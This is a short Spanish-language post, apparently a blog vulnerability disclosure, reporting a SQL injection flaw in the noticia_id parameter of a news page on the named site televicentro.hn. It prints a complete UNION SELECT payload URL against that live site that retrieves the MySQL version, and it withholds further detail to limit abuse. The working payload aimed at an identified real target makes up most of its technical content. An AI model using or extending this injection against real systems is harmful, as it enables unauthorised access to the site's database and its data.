Vulnerabilidad de inyección de SQL
Archivo Vulnerable Campo vulnerable
tvconline_noticia-detalle.php noticia_id
Detalles: Con solo inyectar ' en la url mencionada y se obtiene el error.
Ejemplo:
Version de Mysql:
http://televicentro.hn/new/tvconline_noticia-detalle.php?noticia_id=23814+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,version%28%29,20,21,22,23,24--
Sin más detalles para evitar el abuso de Script kiddies.
0 comentarios :
Publicar un comentario